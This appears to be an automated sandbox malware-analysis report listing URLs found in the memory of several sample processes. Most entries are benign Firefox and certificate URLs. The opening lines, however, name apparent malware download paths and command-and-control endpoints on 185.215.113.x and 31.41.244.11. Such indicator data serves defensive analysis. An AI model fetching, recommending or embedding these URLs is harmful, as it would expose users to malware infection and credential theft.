Source: file.exe, 00000000.00000003.1510540713.0000000005722000.00000004.00000800.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000002.2538505207.0000000000DDE000.00000004.00000020.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2502216813.0000000000DDD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/
Source: skotes.exe, 00000011.00000002.2525644664.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/luma/random.exe
Source: file.exe, 00000000.00000003.1510713355.000000000111F000.00000004.00000020.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000002.2538505207.0000000000DDE000.00000004.00000020.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2502216813.0000000000DDD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/mine/random.exe
Source: 100bc97ff1.exe, 00000013.00000002.2538505207.0000000000DDE000.00000004.00000020.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2502216813.0000000000DDD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/mine/random.exeo
Source: file.exe, file.exe, 00000000.00000003.1510608776.0000000001133000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1510713355.000000000111F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1510777473.0000000001136000.00000004.00000020.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000002.2538505207.0000000000DDE000.00000004.00000020.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000002.2531603198.0000000000AFA000.00000004.00000010.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2502216813.0000000000E0E000.00000004.00000020.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2503189441.0000000000E05000.00000004.00000020.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000002.2539286979.0000000000E0E000.00000004.00000020.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000002.2538505207.0000000000E05000.00000004.00000020.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2502216813.0000000000DDD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exe
Source: file.exe, 00000000.00000003.1510713355.000000000111F000.00000004.00000020.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000002.2538505207.0000000000DDE000.00000004.00000020.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2502216813.0000000000DDD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exee
Source: 100bc97ff1.exe, 00000013.00000002.2538505207.0000000000DDE000.00000004.00000020.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2502216813.0000000000DDD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exee5
Source: file.exe, 00000000.00000003.1510713355.000000000111F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exet
Source: skotes.exe, 00000011.00000002.2525644664.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/steam/random.exe
Source: skotes.exe, 00000011.00000002.2525644664.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/steam/random.exeBs
Source: skotes.exe, 00000011.00000002.2525644664.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/test/num.exe
Source: skotes.exe, 00000011.00000002.2525644664.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/well/random.exe
Source: 76bf5a4dba.exe, 00000014.00000002.2351036059.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206
Source: 76bf5a4dba.exe, 00000014.00000002.2351036059.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206-&O
Source: 76bf5a4dba.exe, 00000014.00000002.2351036059.0000000000FFA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/
Source: 76bf5a4dba.exe, 00000014.00000002.2351036059.0000000000FFA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/3j
Source: 76bf5a4dba.exe, 00000014.00000002.2351036059.0000000000FE4000.00000004.00000020.00020000.00000000.sdmp, 76bf5a4dba.exe, 00000014.00000002.2351036059.0000000000FFA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php
Source: 76bf5a4dba.exe, 00000014.00000002.2351036059.0000000000FFA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php/
Source: 76bf5a4dba.exe, 00000014.00000002.2351036059.000000000101A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php3W
Source: 76bf5a4dba.exe, 00000014.00000002.2351036059.0000000000FFA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php3zr
Source: 76bf5a4dba.exe, 00000014.00000002.2351036059.0000000000FE4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpk
Source: 76bf5a4dba.exe, 00000014.00000002.2351036059.000000000101A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpwW
Source: skotes.exe, 00000011.00000002.2525644664.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/
Source: skotes.exe, 00000011.00000002.2525644664.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000011.00000002.2525644664.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php
Source: skotes.exe, 00000011.00000002.2525644664.0000000000DEA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php1002600001
Source: skotes.exe, 00000011.00000002.2525644664.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php38dedYf
Source: skotes.exe, 00000011.00000002.2525644664.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php=
Source: skotes.exe, 00000011.00000002.2525644664.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php?~:
Source: skotes.exe, 00000011.00000002.2525644664.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpKw
Source: skotes.exe, 00000011.00000002.2525644664.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpKwu
Source: skotes.exe, 00000011.00000002.2525644664.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpc~
Source: skotes.exe, 00000011.00000002.2525644664.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/d
Source: skotes.exe, 00000011.00000002.2525644664.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/d5f9df0b5dafc85062384760ac02b4ded8abeee1fbdf7a815502bb4be1#1003:
Source: skotes.exe, 00000011.00000002.2525644664.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/test.exe
Source: skotes.exe, 00000011.00000002.2525644664.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/test.exej
Source: file.exe, 00000000.00000003.1341423655.000000000582D000.00000004.00000800.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2283971165.000000000573D000.00000004.00000800.00020000.00000000.sdmp, 100bc97ff1.exe, 00000015.00000003.2442693222.0000000005C21000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: file.exe, 00000000.00000003.1341423655.000000000582D000.00000004.00000800.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2283971165.000000000573D000.00000004.00000800.00020000.00000000.sdmp, 100bc97ff1.exe, 00000015.00000003.2442693222.0000000005C21000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: 100bc97ff1.exe, 00000013.00000003.2329931380.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2252846404.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2357604902.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2284782172.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2269828204.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2304213166.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2325695916.0000000000D94000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.micro
Source: 100bc97ff1.exe, 00000013.00000003.2329931380.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2252846404.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2357604902.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2284782172.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2269828204.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2304213166.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2325695916.0000000000D94000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.microj
Source: file.exe, 00000000.00000003.1510713355.000000000110D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.microsoftV/=
Source: file.exe, 00000000.00000003.1341423655.000000000582D000.00000004.00000800.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2283971165.000000000573D000.00000004.00000800.00020000.00000000.sdmp, 100bc97ff1.exe, 00000015.00000003.2442693222.0000000005C21000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: file.exe, 00000000.00000003.1341423655.000000000582D000.00000004.00000800.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2283971165.000000000573D000.00000004.00000800.00020000.00000000.sdmp, 100bc97ff1.exe, 00000015.00000003.2442693222.0000000005C21000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: file.exe, 00000000.00000003.1341423655.000000000582D000.00000004.00000800.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2283971165.000000000573D000.00000004.00000800.00020000.00000000.sdmp, 100bc97ff1.exe, 00000015.00000003.2442693222.0000000005C21000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: file.exe, 00000000.00000003.1341423655.000000000582D000.00000004.00000800.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2283971165.000000000573D000.00000004.00000800.00020000.00000000.sdmp, 100bc97ff1.exe, 00000015.00000003.2442693222.0000000005C21000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: file.exe, 00000000.00000003.1341423655.000000000582D000.00000004.00000800.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2283971165.000000000573D000.00000004.00000800.00020000.00000000.sdmp, 100bc97ff1.exe, 00000015.00000003.2442693222.0000000005C21000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: firefox.exe, 00000024.00000002.2973895907.000001DF225B6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000002.2970037590.000001DF2175D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000002.2970037590.000001DF21750000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000002.2936173309.000001DF1EFE9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com
Source: firefox.exe, 00000024.00000002.2926560740.000001DF1C8DB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/canonical.html
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/canonical.htmlLOAD_MEDIA_SNIFFER_OVERRIDES_CONTENT_TYPEBLOCKING_REAS
Source: firefox.exe, 00000024.00000002.2961278274.000001DF20B55000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.addEventListener
Source: firefox.exe, 00000024.00000002.2961278274.000001DF20B55000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.removeEventListener
Source: firefox.exe, 00000024.00000002.2561696766.000001DF0EE03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/strings
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://json-schema.org/draft-04/schema#
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://json-schema.org/draft-06/schema#
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://json-schema.org/draft-07/schema#
Source: firefox.exe, 00000024.00000002.2544675991.0000015073B00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.o
Source: firefox.exe, 00000024.00000002.2544675991.0000015073B00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/additionalProperties
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/aboutWelcomeBehavior
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/addonsFeatureGate
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/addonsFeatureGateRemote
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/addonsShowLessFrequentlyCap
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/addonsUITreatment
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/addonsUITreatmenthttp://mozilla.org/#/properties/bestMatchBlockingEn
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/appName
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/autoFillAdaptiveHistoryEnabled
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/autoFillAdaptiveHistoryMinCharsThreshold
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/autoFillAdaptiveHistoryMinCharsThresholdbrowser.newtabpage.activity-
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/autoFillAdaptiveHistoryUseCountThreshold
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/autoFillAdaptiveHistoryUseCountThresholdhttp://mozilla.org/#/propert
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bestMatchBlockingEnabled
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bestMatchEnabled_isBelowItemFrequencyCap/impressionsInPeriod
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/boolean
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/feature
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/feature/properties/value
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/feature/properties/value/additiona
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/ratio
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/slug
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0http://mozilla.org/#/properties/appId
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/feature
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/feature/properties/enabled
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/feature/properties/featureId
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/feature/properties/value
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/feature/properties/value/additiona
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/features
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/features/items/properties/featureI
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/features/items/properties/value
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/features/items/properties/value/ad
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/features/itemshttp://mozilla.org/#
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/ratio
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/slug
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1firefox-desktop-aboutwelcome-release-43
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/features/items
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/features/items/properties/featureI
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/features/items/properties/value
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/features/items/properties/value/ad
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/ratio
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/slug
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bucketConfig
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bucketConfig/properties/count
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bucketConfig/properties/namespace
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bucketConfig/properties/randomizationUnit
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bucketConfig/properties/start
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bucketConfig/properties/total
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/cbhStudyRow
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/cbhStudyUs
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/channel
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/csvImport
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/disableGreaseOnFallback
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/disableGreaseOnFallbackWEBEXT_BACKGROUND_PAGE_LOAD_MS_BY_ADDONID
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/dnsMaxAnyPriorityThreads
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/dnsMaxAnyPriorityThreadshttp://mozilla.org/#/properties/ehPreconnect
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/dnsMaxPriorityThreads
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/dnsMaxPriorityThreadsPROT_ListManager.prototype.setUpdateCheckTimer/
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/ehPreconnectEnabled
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/ehPreloadEnabledwebcompat
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/enabled
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/endDate
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/enrollmentEndDate
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/experimentType
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/exposureResults
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/extraParams
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/featureIds
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/featureIds/itemsFirefox
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/featureValidationOptOut
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/filterFetchResponse
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/forceWaitHttpsRR5c141970-5076-0af4-152f-efb3642a7b14
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/greasePaddingSize
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/greasePaddingSizemedia.videocontrols.picture-in-picture.video-toggle
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/h3Enabled
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/h3EnabledATI/AMD
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/h3GreaseEnabled
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/h3GreaseEnabled84ab1546-f779-42cb-8692-4426d38a06ec
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/id
